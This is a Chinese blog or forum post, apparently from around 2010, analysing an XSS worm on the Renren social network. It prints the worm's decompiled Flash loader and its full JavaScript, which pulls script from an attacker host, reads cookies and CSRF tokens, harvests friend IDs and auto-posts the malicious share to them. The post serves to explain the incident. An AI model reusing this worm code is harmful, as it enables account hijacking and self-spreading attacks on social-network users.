今天大家都发现自己莫名其妙的收到了很多Wish You Were Here @ 2016的站内信。
根据这篇日志 http://blog.renren.com/GetEntry.do?id=413070706&owner=265190042&ref=minifeed 中的代码。其原理就是通过swf运行一段恶意js代码从而获取用户cookie,再向校内服务器发送发送站内信请求从而传播。
一下为解出的swf
var fun = "var x=document.createElement(\"SCRIPT\");x.src=\"http://n.99081.com/xnxss1/evil.js\"; x.defer=true;document.getElementsByTagName(\"HEAD\")[0].appendChild(x);"; flash.external.ExternalInterface.call("eval", fun); loadMovie ("http://www.tudou.com/player/outside/player_outside.swf?iid=4120048&default_skin=http://js.tudouui.com/bin/player2/outside/Skin_outside_13.swf&autostart=false&rurl=", this);
以下为调用的js代码
// I'm not a malicious worm.^^; var evil_js = "http://n.99081.com/xnxss1/evil.js"; var evil_swf = "http://o.99081.com/xnxss/1.swf"; function new_xhr(){ var request = false; try { request = new XMLHttpRequest(); } catch (trymicrosoft) { try { request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (othermicrosoft) { try { request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (failed) { request = false; } } } return request; } function ltrim(s){ return s.replace( /^\s*/, ""); } function getMyCookies(){ var myCookies = document.cookie; myCookies = myCookies.split(";") for(i = 0; i < myCookies.length; i++){ if(myCookies[i].indexOf("xssdata=")!=-1){ break; } } if(i<myCookies.length){ return ltrim(myCookies[i]).substring(8); }else{ return "null"; } } function creatIframe(domain){ document.getElementById("logo2").innerHTML='<H1><IMG height=35 src="http://s.xnimg.cn/imgpro/logo/logo-renren-120.png" width=120></H1><iframe name="2016" id="2016" onload="inject()" src="http://'+domain+'.renren.com/ajaxProxy.html?ver=2" width=1 height=1 style="display:none;"></iframe>'; } function inject(){ var x = document.frames("2016").document.createElement("SCRIPT"); x.src = evil_js; x.defer = true; document.frames("2016").document.getElementsByTagName("HEAD")[0].appendChild(x); } function xhr_send(method,url,data,callback){ request=new_xhr(); if (!method){ method="get"; } request.open(method,url,true); if (method=="post"){ request.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); } eval("request.onreadystatechange = "+callback); request.send(data); } function get_tsc() { if (request.readyState == 4){ var tsc_res = request.responseText; var tsc_s = tsc_res.indexOf('id="tsc_popShare"')+25; var tsc_e = tsc_s+32; tsc = tsc_res.substring(tsc_s,tsc_e); document.cookie = "xssdata=|"+tsc+"|"+getMyCookies()+";domain=.renren.com"+";expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/"; parent.creatIframe("share"); } } function get_userid(){ if(request.readyState == 4){ var uid_res = request.responseText; uid_res = uid_res.replace(/"/g, ""); uid_res = uid_res.split("id:"); var uid_arr = new Array(); for(i = 1; i < uid_res.length; i++){ uid_arr.push('"'+uid_res[i].substring(0,9)+'"'); } uid_arr=uid_arr.toString(); document.cookie = "xssdata=["+uid_arr+"];domain=.renren.com;expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/"; parent.creatIframe("share"); } } function preSend(){ if(request.readyState == 4){ document.cookie = "xssdata=friend;domain=.renren.com;expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/"; parent.creatIframe("home"); } } function count(){ if(request.readyState == 4){ document.cookie = "xssdata=infected;domain=.renren.com;expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/"; var a = new Image(); a.src="http://img.tongji.linezing.com/1269734/tongji.gif"; } } function noComment(){ var thread = document.getElementById("thread"); if(thread){ thread.value =0; } } switch(getMyCookies().charAt(0)) { case "n": noComment(); document.cookie = "xssdata=add;domain=.renren.com;expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/"; creatIframe("share"); break; case "a": xhr_send("get","http://share.renren.com/share/buttonshare.do?link=http://g.cn&title=2016",null,"get_tsc"); break; case "f": var url ='http://home.renren.com/friendsSelector.do?p={"init":false,"qkey":"friend","uid":true,"uname":false,"uhead":false,"limit":50,"param":{},"query":"","group":"","net":""}'; xhr_send("get",url,null,"get_userid"); break case "[": xhr_send("get","http://share.renren.com/share/buttonshare.do?link=http://g.cn&title=2016",null,"get_tsc"); break; case "|": var temp = getMyCookies().split("|"); tsc = temp[1]; var xhr_ids = temp[2]; if(xhr_ids.charAt(0)=="a"){ var data = 'post={"filter":null,"reduceRight":null,"reduce":null,"some":null,"every":null,"forEach":null,"map":null,"link":"http://www.tudou.com/programs/view/PgquuM_LGMs/","type":"10","title":"Pink Floyd - Wish You Were Here","pic":"http://image8.tudou.com/data/imgs/i/004/120/048/m25.jpg","fromno":"0","fromShareId":"0","fromShareOwner":"0","fromname":"1.3333333333333333","fromuniv":"","albumid":"0","largeurl":"","sendcomment":"on","action":"add","auth":"99","body":"Wish You Were Here @ 2016.","summary":"'+evil_swf+'","noteId":0}'; data += '&tsc='; data += tsc; xhr_send("post","http://share.renren.com/share/submit.do",data,"preSend"); }else{ var data = "post="; data += '{"action":"sharetofriend","ids":'+xhr_ids+',"form":{"link":"http://www.tudou.com/programs/view/PgquuM_LGMs/","type":"10","title":"Pink Floyd - Wish You Were Here","pic":"http://image8.tudou.com/data/imgs/i/004/120/048/m25.jpg","fromno":"0","fromShareId":"0","fromShareOwner":"0","fromname":"1.3333333333333333","fromuniv":"","albumid":"0","largeurl":"","summary":"'+evil_swf+'"},"body":"Wish You Were Here @ 2016.","subject":"Wish You Were Here","noteId":0}'; data += '&tsc='; data += tsc; xhr_send("post","http://share.renren.com/share/submit.do",data,"count"); } break; default: noComment(); break; }
不过还好只是对支持ActiveX的IE有用。
研究代码ing..先膜拜一下
回复自“校内再次被跨站”
发表回复